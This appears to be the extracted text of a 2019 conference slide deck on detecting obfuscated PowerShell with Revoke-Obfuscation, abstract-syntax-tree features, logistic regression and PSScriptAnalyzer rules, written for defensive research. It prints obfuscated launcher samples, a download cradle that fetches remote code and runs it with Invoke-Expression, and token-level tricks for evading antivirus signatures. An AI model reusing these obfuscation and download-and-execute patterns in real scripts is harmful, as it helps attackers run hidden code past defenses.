PesterSec: Using Pester & ScriptAnalyzer to Detect Obfuscated PowerShell

Daniel Bohannon (@danielhbohannon)
Principal Applied Security Researcher
FireEye's Advanced Practices Team
PesterSec:
Using Pester & ScriptAnalyzer for
Detecting Obfuscated PowerShell
https://victrolacoffeeroasters.files.wordpress.com/2011/04/latte_art_pour.jpg
COPYRIGHT © 2019, FIREEYE, INC. ALL RIGHTS RESERVED.
2019

PesterSec:
Using Pester & ScriptAnalyzer for
Detecting Obfuscated PowerShell
2019

2019
PS> (ls env:User*)[1].Value
• Principal Applied Security Researcher
• FireEye's Advanced Practices Team
• Blog: http://danielbohannon.com
• I like writing detection stuff
• I REALLY like writing obfuscation stuff

$ag = New-Object System.Agenda
• Enter-PSSession -Hostname INTRO
• Out-Obfuscated -Level @(0..10)
• .EXAMPLE IEX Detection Development
• Revoke-Obfuscation #Signatureless
• about_MiminalObfuscation #PSAmsi
• PesterSec
• <# Novel Detection Approaches #>
• Exit-PSSession #Key Takeaways
PowerShell Conference EU 2019

[System.Motivation]::GetBackground()
• Background of 9 years in:
• IT operations
• Operational security
• Incident Response consulting
• Applied detection R&D at scale
• 2 consistent things in each role

• IT operations
• Coffee connoisseur
https://www.beanthere.co.za/shop/home-brewing/chemex-coffee-maker/

• IT operations
• Coffee connoisseur
• Aspiring PowerShell aficionado
https://i2.wp.com/powershelldistrict.com/wp-content/uploads/2015/01/PowerShell-Hero.png https://www.beanthere.co.za/shop/home-brewing/chemex-coffee-maker/

• @(1..9) | % { "$_ years Working" }
• @(1..7) | % { "$_ years PowerShelling" }
• @(1..6) | % { "$_ years Detecting" }
https://i2.wp.com/powershelldistrict.com/wp-content/uploads/2015/01/PowerShell-Hero.png

• @(1..9) | % { "$_ years Working" }
• @(1..6) | % { "$_ years Detecting" }
http://haxf4rall.com/2017/12/18/invoke-psimage-tool-to-embed-powershell-scripts-in-png-image-pixels/
Attackers PowerShell

• @(1..9) | % { "$_ years Working" }
• @(1..6) | % { "$_ years Detecting" }
• @(1..3) | % { "$_ years Obfuscating" }
while ($attacker.techniques -contains 'evasion')
{
$research = New-Research -Type Detection
New-Detection -Content $research –Type @('host','network')
}
https://i2.wp.com/powershelldistrict.com/wp-content/uploads/2015/01/PowerShell-Hero.png

• FireEye Advanced Practices Team
• Tracking attacker activity
• Researching new attacker
methods
• Developing detections for these
methods
about_FindingEvil
https://cdn-images-1.medium.com/max/1600/1*pazSTVPiSkUB7w7WiDpZNA.jpeg

Get-Evil | Sort-Object ObfuscationLevel | ogv
• Slice & dice some malicious
PowerShell
• Highlight varying obfuscation
levels & styles
• Discuss trends in PowerShell
obfuscation & detection efforts
• Signatures vs signatureless vs
targeted feature-based signatures
• Novel detection approaches
https://www.brafton.com/wp-content/uploads/2019/01/searching.gif

Get-Help Invoke-((Ob|DOS)fuscation|CradleCrafter) -Example
https://media.giphy.com/media/dTGeSnz0FzufK/giphy.gif

Get-Help Invoke-((Ob|DOS)fuscation|CradleCrafter) -Example

Start-Process -Verb Detect -ArgumentList @('piece','by','piece')
• Static detection R&D often starts
with identifying numerous
building blocks
• Focus on multi-level detection of
building blocks
• Treat as either high fidelity or
combination of #WeakSignals
https://www.tibco.com/blog/wp-content/uploads/2015/05/lego.jpg

Start-Process -Verb Detect -ArgumentList
@('piece','by','piece')
• Static detection R&D often starts
with identifying numerous
building blocks
• Focus on multi-level detection of
building blocks
• Treat as either high fidelity or
combination of #WeakSignals
https://www.tibco.com/blog/wp-content/uploads/2015/05/lego.jpg

Start-Process -Verb Detect -ArgumentList @('piece','by','piece')
https://media2.giphy.com/media/vRDMuINIfLTc4/giphy.gif
• Why this signature-based static
detection when PowerShell logging is
available?
• Defense in depth (if PS logging
disabled)
• Detecting guardrailed and/or keyed
PowerShell
• Open Source repo detection using
YARA rules
• Network detection of PS transfers

Out-Obfuscated -Level @(999..100000)
${-'*}=+$( ); ${ }= ${-'*} ; ${(+} =++ ${-'*};${)}=(${-'*}=${-'*}+${(+} ) ; ${'/}= (${-'*}
=${-'*}+ ${(+} ); ${@} = ( ${-'*}=${-'*} + ${(+}) ; ${~ =} =( ${-'*}= ${-'*}+ ${(+}); ${;}
=(${-'*} =${-'*}+${(+}) ; ${+} = (${-'*}= ${-'*} + ${(+}) ; ${]} = ( ${-'*} =${-'*} +
${(+});${-}= (${-'*}=${-'*} + ${(+} ) ; ${-$.}="["+ "$( @{ }) "[${+}] +"$(@{})"["${(+}" +"${-
}"]+ "$(@{} )"["${)}"+ "${ }" ] + "$? "[${(+} ] +"]";${-'*}="".("$(@{} )"[ "${(+}" +
"${@}"]+"$(@{} ) "[ "${(+}" + "${;}" ]+ "$(@{} )"[ ${ }]+"$(@{ })"[ ${@}] +"$?
"[${(+}]+"$(@{} ) "[${'/}]) ; ${-'*} ="$(@{ } )"[ "${(+}" + "${@}"] +"$(@{ })"[${@}]+ "${-
'*}"["${)}"+"${+}"] ; "${-'*}(${-$.}${+}${'/} + ${-$.}${;}${-} +${-$.}${]}${]} + ${-$.}${'/}${)}
+ ${-$.}${@}${ }+ ${-$.}${+}${]}+${-$.}${(+}${ }${(+} +${-$.}${(+}${(+}${-}+ ${-$.}${@}${~ =} + ${-
$.}${+}${-} + ${-$.}${-}${]}+${-$.}${(+}${ }${;} + ${-$.}${(+}${ }${(+}+${-$.}${-}${-}+${-
$.}${(+}${(+}${;}+ ${-$.}${'/}${)}+ ${-$.}${+}${]}+${-$.}${(+}${ }${(+}+ ${-$.}${(+}${(+}${;}+${-
$.}${@}${;} +${-$.}${]}${+} + ${-$.}${(+}${ }${(+} +${-$.}${-}${]}+${-$.}${;}${+} + ${-$.}${(+}${
}${]} +${-$.}${(+}${ }${~ =} +${-$.}${(+}${ }${(+}+ ${-$.}${(+}${(+}${ }+ ${-$.}${(+}${(+}${;} +
${-$.}${@}${(+} + ${-$.}${@}${;}+${-$.}${;}${]}+ ${-$.}${(+}${(+}${(+} +${-$.}${(+}${(+}${-} + ${-
$.}${(+}${(+}${ }+ ${-$.}${(+}${ }${]} + ${-$.}${(+}${(+}${(+} + ${-$.}${-}${+}+${-$.}${(+}${ }${ }
+${-$.}${]}${'/}+${-$.}${(+}${(+}${;}+ ${-$.}${(+}${(+}${@}+ ${-$.}${(+}${ }${~ =} + ${-
$.}${(+}${(+}${ } + ${-$.}${(+}${ }${'/}+ ${-$.}${@}${ }+ ${-$.}${'/}${-}+${-$.}${(+}${ }${@}+${-
$.}${(+}${(+}${;} +${-$.}${(+}${(+}${;} + ${-$.}${(+}${(+}${)}+${-$.}${~ =}${]}+${-$.}${@}${+}+${-
$.}${@}${+} + ${-$.}${-}${]}+${-$.}${(+}${ }${~ =} + ${-$.}${(+}${(+}${;} +${-$.}${@}${;}+ ${-
$.}${(+}${ }${]} +${-$.}${(+}${)}${(+}+ ${-$.}${@}${+} +${-$.}${+}${;}+ ${-$.}${~ =}${(+} +${-
$.}${(+}${ }${'/}+ ${-$.}${@}${-} +${-$.}${(+}${(+}${;}+${-$.}${'/}${-} + ${-$.}${@}${(+})"|. ${-'*}

${ }= + $( ); ${ }= ${ } ; ${ } =++${ } ;${ }= (${ }= ${ }+${ });${
}=(${ } = ${ }+${ } ) ;${ }=( ${ }= ${ } +${ } ) ;${ } =( ${ }
= ${ } +${ } );${ } = ( ${ }= ${ } +${ } ) ;${ }=( ${ }= ${ } +
${ }) ; ${ } =(${ }= ${ } +${ }); ${ } =(${ } = ${ } +${ }); ${ }
= "[" +"$(@{ })"[ ${ }] + "$(@{})"[ "${ }${ }"]+ "$(@{ } )"[ "${ }${ }"] + "$? "[${
}]+"]" ; ${ } ="".("$( @{ }) "[ "${ }${ }"]+"$(@{ } )"["${ }${ }" ]+"$( @{}) "[ ${ }
]+"$(@{} ) "[ ${ } ]+ "$?"[ ${ } ] +"$(@{ }) "[ ${ }]);${ } = "$( @{} ) "[ "${ }" +
"${ }" ] +"$( @{ }) "[ ${ } ]+"${ }"[ "${ }" + "${ }" ]; & ${ } ( " ${
}${ }${ } +${ }${ }${ } + ${ }${ }${ }+ ${ }${ }${ } +${ }${ }${
}+ ${ }${ }${ }+${ }${ }${ }${ }+ ${ }${ }${ }${ }+ ${ }${
}${ }+ ${ }${ }${ }+ ${ }${ }${ }+${ }${ }${ }${ }+ ${ }${ }${
}${ } +${ }${ }${ }+ ${ }${ }${ }${ }+${ }${ }${ }+ ${ }${ }${
}+${ }${ }${ }${ } +${ }${ }${ }${ }+${ }${ }${ } +${ }${ }${ } +${
}${ }${ }${ } +${ }${ }${ } +${ }${ }${ }+ ${ }${ }${ }${ } + ${
}${ }${ }${ }+${ }${ }${ }${ }+${ }${ }${ }${ }+${ }${ }${
}${ }+ ${ }${ }${ } + ${ }${ }${ }+ ${ }${ }${ }+ ${ }${ }${ }${ } +${
}${ }${ }${ }+${ }${ }${ }${ }+${ }${ }${ }${ }+ ${ }${ }${
}${ } +${ }${ }${ } + ${ }${ }${ }${ }+ ${ }${ }${ }+${ }${
}${ }${ } +${ }${ }${ }${ } + ${ }${ }${ }${ }+ ${ }${ }${ }${
}+${ }${ }${ }${ } + ${ }${ }${ }+ ${ }${ }${ }+${ }${ }${
}${ } +${ }${ }${ }${ } +${ }${ }${ }${ }+ ${ }${ }${ }${ }+${ }${ }${
} + ${ }${ }${ }+ ${ }${ }${ } + ${ }${ }${ } +${ }${ }${
}${ }+ ${ }${ }${ }${ }+ ${ }${ }${ } +${ }${ }${ }${ }+${ }${ }${ }${
} + ${ }${ }${ } + ${ }${ }${ }+${ }${ }${ } +${ }${ }${ }${
} + ${ }${ }${ }+${ }${ }${ }${ } + ${ }${ }${ } + ${ }${ }${
}| ${ }")

'
' | % {$Script = $_ -Split '' |
% {''; $_.Split('') | % {$_.Length-1}} ; $DecodedCommand = [Char[]]
[Int[]]($Script[0..($Script.Length-1)] -Join '').Trim('').Split('') -Join
''; IE`X $DecodedCommand}
1000’s of
whitespace &
tab characters

about_RevokeObfuscation
-not ($healthy -or $normal)

Avg Char Freq
of ALL 3.4K
PoshCode
scripts

SAMPLE 2: Symbolic
(0.157)
SAMPLE 1: Invoke-Obfuscation
(0.379)

Similarity

Similarity
https://cobbr.io/ObfuscationDetection.html

https://en.wikipedia.org/wiki/Precision_and_recall
Similarity
Measure Score
Accuracy 0.71
Precision 0.89
Recall 0.37
F1 Score 0.52
True Positives 0.16
False Positives 0.02
True Negatives 0.55
False Negatives 0.27

https://media.giphy.com/media/WWRArOTz2L3wI/200w_d.gif

Get-Command -Name ("{1}{0}" -f "-Process","Get")
about_AbstractSyntaxTree
StringExpandable
RParenComma
StringExpandable
Format
StringExpandable
LParen
Parameter
Generic

Get-Command -Name ("{1}{0}" -f "-Process","Get")
about_AbstractSyntaxTree
StringExpandable
RParenComma
StringExpandable
Format
StringExpandable
LParen
Parameter
Generic
ScriptBlockAst
NamedBlockAst: Begin NamedBlockAst: End
StatementAst
PipelineAst
CommandAst
StringConstantExpressionAst CommandParameterAst ParenExpressionAst
PipelineAst
BinaryExpressionAst
Operator: FormatLeft: StringConstantAst Right: ArrayLiteralAst
0: StringConstantExpressionAst 1: StringConstantExpressionAst

about_LogisticRegression #MathStuff
+ =
Linear Regression Logit Function
Logistic
Regression
https://en.wikipedia.org/wiki/Logistic_regression

about_StochasticGradientDescent #MoarMathStuff
• Result = Bias + (F1 * Weight1)
+ (F2 * Weight2) + (…)
• ExpectedResult = (from labeled
data)
• Error = Result – ExpectedResult
• Adjust each weight according to
how much they contributed to the
error. Do this a lot.
https://en.wikipedia.org/wiki/Stochastic_gradient_descent

about_LeeAndDanielHappyDance
https://en.wikipedia.org/wiki/Precision_and_recall
Measure Cosine
Similarity
Logistic Regression
with Gradient Descent
Accuracy 0.71 0.96
Precision 0.89 0.96
Recall 0.37 0.94
F1 Score 0.52 0.95
True Positives 0.16 0.36
False Positives 0.02 0.01
True Negatives 0.55 0.60
False Negatives 0.27 0.02
10x better at
finding
obfuscated
content
Half the false
positives

Get-Help Revoke-Obfuscation -Role
• Revoke-Obfuscation highlights:
• First AST-based PowerShell
obfuscation detection framework
• Signatureless data science
approach
• Daniel’s first “real” PowerShell
module (& published to PowerShell
Gallery)
https://steamuserimages-a.akamaihd.net/ugc/26225809579209707/BD9801C802D330C551B79820D23BD8074DA9B75D/

Out-Obfuscated -Level Minimal
• Level & depth of obfuscation in
malicious PowerShell varies wildly
• No obfuscation – BLAND
• Minimal obfuscation – ???
• Maximum obfuscation – ???
http://www.pngpix.com/wp-content/uploads/2016/06/PNGPIX-COM-Sliced-Wheat-Bread-PNG-Image.png

• Maximum obfuscation – SALTY
http://www.pngpix.com/wp-content/uploads/2016/06/PNGPIX-COM-Sliced-Wheat-Bread-PNG-Image.png
https://thumbs.gfycat.com/AnchoredAchingBighorn-size_restricted.gif

• ^^^ layered – EXTRA-SALTY
https://steamuserimages-a.akamaihd.net/ugc/993492320936652061/35067ABF992F42EF4A7447CD39CA37A856EF08C0/

• Minimal obfuscation – TASTEFUL
• ^^^ layered – EXTRA-SALTY
https://media.giphy.com/media/l4Jz3a8jO92crUlWM/giphy.gif

• Minimal obfuscation – TASTEFUL
https://media.giphy.com/media/l4Jz3a8jO92crUlWM/giphy.gif
Ryan Cobb
(@cobbr_io)

Get-Help PSAmsi -Functionality
• Using the AST (Abstract Syntax Tree) for minimal obfuscation
• PSAmsi (@cobbr_io)
• Uses AST to minimally
obfuscate PowerShell
scripts to evade specific
A/V signatures
• https://github.com/cobbr/PSAmsi
https://specterops.io/who-we-are/the-team

Out-Obfuscated -Level Minimal -Type @('Quantity','Depth')
• Two types of minimal obfuscation (can be combined):
• Quantity – Obfuscate only 3 of the 27 script blocks
• Depth – Light obfuscation of any given token
Deep Obfuscation Shallow Obfuscation
."Do`wn`load`Str`in`g" ."Download`String"
.("{1}{0}{2}" -f
"load","Down","String") .("Download"+"String")

Out-Obfuscated -Level Minimal -Type @('Quantity','Depth')
• Two types of minimal obfuscation (can be combined):
• Quantity – Obfuscate only 3 of the 27 script blocks
• Depth – Light obfuscation of any given token
.("{1}{0}{2}" -f
Targeted Token-Specific Detection Opportunity!

Get-Help PesterSec -Examples
• How can PSScriptAnalyzer help us detect minimal obfuscation?
• In-depth signatures targeting specific AST node types, relationships, etc.
• Measure-TickUsageInMember

.("{1}{0}{2}" -f

• Measure-NonAlphanumericUsageInMember

.("{1}{0}{2}" -f

• Measure-LongMemberValue

Deep Obfuscation (Invoke-CradleCrafter)
((((New-Object
Net.WebClient)|GM)|Where-Object{(Get-
Item Variable:/_).Value.Name-
like'D*g'}).Name)

• Measure-TickUsageInVariable

Invocation Obfuscation
. ( ${e`Nv:c`oM`sPEC}[4,15,25]-JOin'' )

. ( ${e`Nv:c`oM`sPEC}[4,15,25]-JOin'' )

. ( ${eNv:coMsPEC}[4,15,25]-JOin'' )
27 chars

. ( ${eNv:coMsPEC}[4,15,25]-JOin'' )
4 15 25

. 'iex'
4 15 25
https://i.imgur.com/8oXBdLG.gif

• Measure-NonAlphanumericUsageInVariable

Variable Obfuscation (ISE Steroids)
${____/=/==//===}

New-Item -ItemType Idea -Name PesterSec
• PS> Invoke-Expression (New-Object
Net.WebClient)."`Dò`wn`lòa`d`Strìn`g"(
'ht'+'tps:/bit.ly/L3g1t')

Get-Help PesterSec -Detailed
• PSScriptAnalyzer_Obfuscation_Detection_Rules.psm1
• Measure-TickUsageInCommand
• Measure-TickUsageInArgument
• Measure-SAObfuscation.psm1
• Wrapper module for displaying aggregated ScriptAnalyzer hits

$moduleLogs | Group-Object PipelineID,CommandName
• Fingerprint abnormal scripts by cmdlet groupings
• AST to query from extracted script (group on Command)
• EID 4103 events for executed script (group on PipelineID,CommandName)
# Load script to analyze.
$script = Invoke-WebRequest
https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-
Mimikatz.ps1
# Tokenize script.
$tokens = [System.Management.Automation.PSParser]::Tokenize($script, [ref] $null)
# Group on Command (cmdlet/alias/etc.) to find high concentration of repeated Commands.
$tokens | Where-Object { $_.Type -eq 'Command' } | Group-Object Content | Where-Object {
$_.Count -ge 10 } | Sort-Object Count -Descending | Select-Object Count,Name

Compare-Object $oldPSLog $newPSLog
powershell.exe Invoke-Expression $env:gkwa
Pipeline execution details for command line: Invoke-Expression $env:gkwa
Context Information:
DetailSequence=1
<REDACTED>
CommandLine=Invoke-Expression $env:gkwa
Details:
CommandInvocation(Invoke-Expression): "Invoke-Expression"
ParameterBinding(Invoke-Expression): name="Command"; value="<REDACTED>"
Windows PowerShell – EID 800
Cmdlet invoked
Parent ScriptBlock

powershell.exe iex $env:gkwa
Pipeline execution details for command line: iex $env:gkwa
DetailSequence=1
<REDACTED>
CommandLine=iex $env:gkwa
Details:
Cmdlet invoked
Parent ScriptBlock

powershell.exe ie`x $env:gkwa
Pipeline execution details for command line: ie`x $env:gkwa
DetailSequence=1
<REDACTED>
CommandLine=ie`x $env:gkwa
Details:
Cmdlet invoked
Parent ScriptBlock
OBFUSCATED!

sV s3zxl5 ( [typE]( "{1}{0}{2}" -f'ViRO','en','NmeNt') ) ; ( ( VARIaBle S3ZXl5 -Va
)::( "{1}{0}{3}{4}{2}"-f 'V','geten','e','iRONmeNTv','ARIAbL' ).Invoke( 'gkwa',(
"{2}{1}{0}" -f 'S','ocES','pR' )) ) |. ( ${e`Nv:còM`sPEC}[4,15,25]-JOin'' )
Pipeline execution details for command line: sV s3zxl5 ( [typE]( "{1}{0}{2}" -f'ViRO','en','NmeNt') ) ; ( (
VARIaBle S3ZXl5 -Va )::( "{1}{0}{3}{4}{2}"-f 'V','geten','e','iRONmeNTv','ARIAbL' ).Invoke( 'gkwa',( "{2}{1}{0}" -f
'S','ocES','pR' )) ) |. ( ${e`Nv:còM`sPEC}[4,15,25]-JOin'' )
DetailSequence=1
<REDACTED>
CommandLine=sV s3zxl5 ( [typE]( "{1}{0}{2}" -f'ViRO','en','NmeNt') ) ; ( ( VARIaBle S3ZXl5 -Va )::(
"{1}{0}{3}{4}{2}"-f 'V','geten','e','iRONmeNTv','ARIAbL' ).Invoke( 'gkwa',( "{2}{1}{0}" -f 'S','ocES','pR' )) ) |. (
${e`Nv:còM`sPEC}[4,15,25]-JOin'' )
Details:
OBFUSCATED!

$keyTakeaway[0]
• PowerShell obfuscation is easily accessible to all
• Used frequently ITW
• MOSTLY de-obfuscated by PowerShell scriptblock logging
• Data science-driven detection exists with Revoke-Obfuscation
• Maximum obfuscation is used by some attackers more than others
• Minimal obfuscation is far less frequent but quite effective
• PSScriptAnalyzer enables the best of both worlds for detection:
• AST for targeted token type calculations and inspection
• Flexible logic for marking as suspicious, creating weak signals, etc.

$keyTakeaway[1] # Thank You PowerShell Community!!!
• TFW you combine PowerShell logging, Revoke-Obfuscation AND PesterSec:
https://media0.giphy.com/media/6XTnkNHVZv6AU/giphy.gifhttps://thumbs.gfycat.com/CooperativeDeliciousCaracal-size_restricted.gif

• Daniel Bohannon
• Twitter: @danielhbohannon
• Blog: https://danielbohannon.com/
• Github:_https://github.com/danielbohannon/
about_Author
http://workpulse.io/blog/wp-content/uploads/2015/09/themasterpeice.gif

PesterSec: Using Pester & ScriptAnalyzer to Detect Obfuscated PowerShell

More Related Content

What's hot

Similar to PesterSec: Using Pester & ScriptAnalyzer to Detect Obfuscated PowerShell

Recently uploaded

PesterSec: Using Pester & ScriptAnalyzer to Detect Obfuscated PowerShell